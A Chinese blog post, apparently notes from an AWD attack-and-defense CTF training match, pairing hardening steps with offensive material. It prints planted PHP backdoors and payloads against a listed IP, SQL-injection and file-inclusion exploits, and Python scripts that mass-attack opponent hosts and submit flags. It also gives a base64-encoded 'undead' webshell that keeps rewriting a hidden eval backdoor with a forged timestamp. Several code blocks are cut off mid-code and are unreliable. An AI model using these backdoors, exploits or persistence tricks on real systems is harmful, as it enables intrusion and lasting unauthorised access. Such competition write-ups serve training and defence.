AWD之赛前赛后

0xdawn

作为一名资深懒狗，距离上一次星盟四月AWD训练赛过去一个月，在五月训练前才开始整理AWD，请大佬轻锤。

训练赛使用的是实验室自研的H1ve平台，强行安利一下H1ve顺便吹一波彭锅

赛后总结我拿的是第一道题web_yunnan_simple来写的

上线后

上线一定要快，晚点上线人家马都给你安排上了

修改ssh密码

passwd username //回车输入新密码

备份源码

tar -zcvf /tmp/web.tar.gz /var/www/html/*	//tar打包

定期备份的话因人而异，我不是很喜欢用

crontab backupcrontab.txt

backupcrontab.txt中写入

0 1 * * * tar -zcvf /tmp/web.tar.gz /var/www/html/*

详见：Linux中使用crontab设置定时任务

预留后门查杀

• D盾
• WebShellKiller

config.php

@eval($_REQUEST['c']);

payload：
http://106.52.236.34:10180/config.php?c=system(%27cat%20/flag%27);

footer.php

$shell=$_POST['shell'];
system($shell);

payload：
POST
shell=cat /flag

admin/footer.php同上

admin/header.php

payload：
http://106.52.236.34:10180/admin/header.php?p=cat%20/flag

修改Mysql密码

mysql -u root -p	//登陆后用以下命令
set password for root@localhost=password('新密码');

备份数据库

账号密码一般在config.php，如果修改了密码记得修改config.php

备份：mysqldump -u root -p dbname>db.sql
还原：create database tmp;
	 use tmp;
	 source db.sql

修改admin默认密码

update admin set user_pass='新密码' where user_name='admin';

上回只补了login页面的sql注入，没注意到默认密码可以一直登录拿flag

添加脚本

流量监控

郁离歌大佬的waf

 $value) { 
if (substr($name, 0, 5) == 'HTTP_') 
$headers[str_replace(' ', '-', ucwords(strtolower(str_replace('_', ' ', substr($name, 5)))))] = $value;
} 
return $headers; 
} 
} 
$get = $_GET; 
$post = $_POST; 
$cookie = $_COOKIE; 
$Session = $_SESSION;  // added
$header = getallheaders(); 
$files = $_FILES; 
$ip = $_SERVER["REMOTE_ADDR"]; 
$method = $_SERVER['REQUEST_METHOD']; 
$filepath = $_SERVER["SCRIPT_NAME"]; 
foreach ($_FILES as $key => $value) { 
$files[$key]['content'] = file_get_contents($_FILES[$key]['tmp_name']); 
file_put_contents($_FILES[$key]['tmp_name'], "virink"); 
}

unset($header['Accept']);
$input = array("Get"=>$get, "Post"=>$post, "Cookie"=>$cookie, "File"=>$files, "Session"=>$_SESSION,"Header"=>$header);

logging($input);

}

function logging($var){ 
$filename = $_SERVER['REMOTE_ADDR'];
$LOG_FILENAME = LOG_FILEDIR."/".$filename;
$time = date("Y-m-d G:i:s");
file_put_contents($LOG_FILENAME, "\r\n".$time."\r\n".print_r($var, true), FILE_APPEND); 
file_put_contents($LOG_FILENAME,"\r\n".'http://'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'], FILE_APPEND);
file_put_contents($LOG_FILENAME,"\r\n***************************************************************",FILE_APPEND);
}

waf();

使用方法：

在所有php文件中加入``require_once(‘waf.php’);

懒狗的话直接找个公用文件，如config.php，然后包含waf

或者修改php.ini文件

Automatically add files before or after any PHP document.
auto_prepend_file = /var/www/html/waf.php;

另外一个功能更强大的：

https://github.com/wupco/weblogger

文件监控

dir = $this->getparam($argv);
		$this->getfiles($this->dir);
		print "[+] total:".count($this->files[$this->i])."\n\r";
		$this->i++;
		while(true)
		{
			$this->getfiles($this->dir);
			if(isset($this->files[$this->i-1]) && ((count($this->files[$this->i])>count($this->files[$this->i-1]))))
			{
				print "[+] total:".count($this->files[$this->i])."\n\r";
				print "[*] addfile: ".implode('|',array_diff($this->files[$this->i],$this->files[$this->i-1]))."\n\r";
			}
			if(isset($this->files[$this->i-1]) && ((count($this->files[$this->i])files[$this->i-1]))))
			{
				print "[+] total:".count($this->files[$this->i])."\n\r";
				print "[*] deletefile: ".implode('|',array_diff($this->files[$this->i-1],$this->files[$this->i]))."\n\r";
			}
			if(isset($this->filesize[$this->i-1]))
			{
				array_map(function($v,$val,$key){
					if($v != $val)
					{
						print "[*] updatefile:{$key}\n\r";
					}
				},$this->filesize[$this->i-1],$this->filesize[$this->i],array_keys($this->filesize[$this->i]));
			}
			$this->i++;
			if($this->i>=30)
			{
				$this->files = [];
				$this->filesize = [];
				$this->i = 0;
			}
		}
	}

	private function getparam($argv)
	{
		foreach($argv as $key=>$val)
		{
			if($val == "--dir")
			{
				return is_dir($argv[$key+1])?$argv[$key+1]:exit("[-] directory does not exist!");
			}
		}
	}

	private function getfiles($dir)
	{
		if(is_dir($dir))
		{
			$d = scandir($dir);
			foreach($d as $v)
			{
				if($v != '.' && $v != '..')
				{
					if(is_dir("{$dir}/{$v}"))
					{
						$this->getfiles("{$dir}/{$v}");	
					}
					else
					{
						$this->files[$this->i][] = "{$dir}/{$v}";
						$this->filesize[$this->i]["{$dir}/{$v}"] = filesize("{$dir}/{$v}");
					}
				}
			}
		}
		else
		{
			$this->files[$this->i][] = $dir;
			$this->filesize[$this->i][$dir] = filesize($dir);
		}
	}
}
print " 
    _____________
   < FileMonitor >
    -------------
      /\_)o<
     |       | 
     | O . O |
      \_____/
    By CoolCat
";
new FileMonitor($argv);
?>

用法

php fileMonitor.php --dir ./

代码审计

文件包含

about.php

$file=$_GET['file'];
include $file;

payload：
http://106.52.236.34:10180/about.php?file=../../../flag

contact.php

$file_path = $_GET['path'];
if(file_exists($file_path)){
	$fp = fopen($file_path,"r");
	$str = fread($fp,filesize($file_path));
	echo $str = str_replace("\r\n","
",$str);
}

payload：
http://106.52.236.34:10180/contact.php?path=../../../flag

sql注入

login.php

用户名：',$user,'
密码：',$pass,'

用户名密码错误';
       }
       
} 
?>

payload:
username：admin' and 1=1#
password：随便填

search.php

payload：
http://106.52.236.34:10180/search.php?id=-1%20union%20select%201,group_concat(user_name,0x7e,user_pass),3%20from%20test.admin%23

敏感信息泄露

admin/index.php

这里也挺鸡贼的，打到一半才发现这里直接就把flag给泄露出去了，admin登录直接拿到

flag:

admin/upload/1532851316.php

文件上传

$error=$_FILES['pic']['error'];
$tmpName=$_FILES['pic']['tmp_name'];
$name=$_FILES['pic']['name'];
$size=$_FILES['pic']['size'];
$type=$_FILES['pic']['type'];
try{
	if($name!=="")
	{
		$name1=substr($name,-4);
		if(is_uploaded_file($tmpName)){
			$time=time();
			$rootpath='./upload/'.$time.$name1;
			$file=fopen($tmpName, "r") or die('No such file!');
                	$content=fread($file, filesize($tmpName));
                	if(strstr($content,'fuck')){
                        	exit("");
                	}
			if(!move_uploaded_file($tmpName,$rootpath)){
				echo "";
				exit;
			}
		}
		echo "上传成功：/upload/".$time.$name1;
	}
}
catch(Exception $e)
{
	echo "ERROR";
}

//直接传一句话小马就行，没有任何过滤

文件上传的洞还不太会修，训练赛的时候尝试补了一下，但是页面直接挂了。所以我直接注释掉输出上传文件的位置，并且重命名时在时间戳后面再拼了一些东西，所以即使传了马也用不了。似乎也没被check的样子…

$rootpath='./upload/'.$time.'随便拼点东西进来'.$name1;

修补工作

open_basedir

• 在php.ini中加入open_basedir="/var/www/html"
• 在程序中加入ini_set('open_basedir', '/var/www/html');
• 在apache的httpd.conf中的Directory配置php_admin_value open_basedir "/var/www/html"
• httpd.conf中的VritualHostphp_admin_value open_basedir "/var/www/html"
• nginx fastcgi.conf：fastcgi_param PHP_VALUE "open_basedir=/var/www/html"

addslashes

$id=addslashes($id);	//sql语句中记得给$id加上单引号

批量打全场

打预留马

手速要快，预留的估计打个一两轮就没了，发现了就赶紧跑脚本打

import requests
import time


#GET
url = "http://106.52.236.34:1"
payload = "/config.php?c=system('cat /flag');"

for i in range(1,30):
    if (i <10):
        flag_url = url + "0" + str(i) + "80" + payload
    else:
        flag_url = url + str(i) + "80" + payload
    print(flag_url)
    r = requests.get(flag_url)
    if "flag" in r.text:
        print(r.text)
        print("~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~")
        time.sleep(1)


'''
#POST
url = "http://106.52.236.34:1"
payload = "/footer.php"
data = {'shell':'cat /flag'}

for i in range(1,30):
    if (i <10):
        flag_url = url + "0" + str(i) + "80" + payload
    else:
        flag_url = url + str(i) + "80" + payload
    print(flag_url)
    r = requests.post(flag_url,data=data)
    if "flag" in r.text:
        print(r.text)
        print("~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~")
        time.sleep(1)
'''

提交flag

#coding:utf-8
import requests
import re
import time

url = "http://ip:"
url1 = ""
shell = "/includes/config.php?d=system"
passwd = "c" 
port = "80"
payload = {passwd: 'cat /flag'}

flag_server = "http://flag_server/flag_file.php?token=%s&flag=%s"
teamtoken = "team1"

def submit_flag(target, teamtoken, flag):
    url = flag_server % (teamtoken, flag)
    pos = {}
    print "[+]Submitting flag:%s:%s" % (target, url)
    response = requests.post(url, data=pos)
    content = response.text
    print "[+]content:%s" % content
    if "success" in content:
        print "[+]Success!!"
        return True
    else:
        print "[-]Failed"
        return False


def flag():
    f=open("webshelllist.txt","w") 
    f1=open("firstround_flag.txt","w")
    for i in [8802,8803,8804]: 
        url1=url+str(i)+shell
        try:
            print "------------------------------------"
            res=requests.post(url1,payload,timeout=1)
            if res.status_code == requests.codes.ok:
                print url1 + " connect shell sucess,flag is "+res.text
                # 记录shell和获取的flag
                print >>f1,url1+" connect shell sucess,flag is "+res.text
                print >>f,url1+","+passwd
                # 正则捕获flag
                if re.match(r'hello world(\w+)', res.text):   
                    flag = re.match(r'hello world(\w+)', res.text).group(1)
                    submit_flag(url1, teamtoken, flag)
                else:
                    print "[-]Can not get flag"
            else:
                print "shell 404"
        except:
            print url1 + "connect shell failed"
    		
    f.close()
    f1.close()

def timer(n):
    while True:
        flag()
        flag()
        flag()
        time.sleep(n)

timer(300) # 一般为5分钟一轮

权限维持

软连接

ln -s /flag css/XXXXXXXX.css

一句话马

不死马

');
		}
		system('chmod 777 .header.php');
		touch("./.header.php",mktime(20,15,1,4,28,2019));
		usleep(100);
	}
?>

"system(base64_decode(ZWNobyAnUEQ5d2FIQWdDZ2xwWjI1dmNtVmZkWE5sY2w5aFltOXlkQ2gwY25WbEtUc0tDWE5sZEY5MGFXMWxYMnhwYldsMEtEQXBPd29KZFc1c2FXNXJLRjlmUmtsTVJWOWZLVHNLQ1hkb2FXeGxJQ2d4S1hzS0NRbHBaaWdoWm1sc1pWOWxlR2x6ZEhNb0p5NHZMbWhsWVdSbGNpNXdhSEFuS1NsN0Nna0pDV1pwYkdWZmNIVjBYMk52Ym5SbGJuUnpLQ2N1THk1b1pXRmtaWEl1Y0dod0p5d25QRDl3YUhBZ2FXWW9iV1ExS0NSZlVFOVRWRnNpY0dGemN5SmRLVDA5UFNKaVl6SXlPV1ZsWXpjME5tSmhOalpoWkRGbE16STJabVkyTkRCbE9UaG1ZaUlwZTBCbGRtRnNLQ1JmVUU5VFZGc2lhR0ZqYXlKZEtUdDlJRDgrSnlrN0Nna0pmUW9KQ1hONWMzUmxiU2duWTJodGIyUWdOemMzSUM1b1pXRmtaWEl1Y0dod0p5azdDZ2tKZEc5MVkyZ29JaTR2TG1obFlXUmxjaTV3YUhBaUxHMXJkR2x0WlNneU1Dd3hOU3d4TERRc01qZ3NNakF4T1NrcE93b0pDWFZ6YkdWbGNDZ3hNREFwT3dvSmZRby9QZz09JyB8IGJhc2U2NCAtZCA+IC5jb25maWcucGhwOw==));"

核弹马

免杀一句话

待补充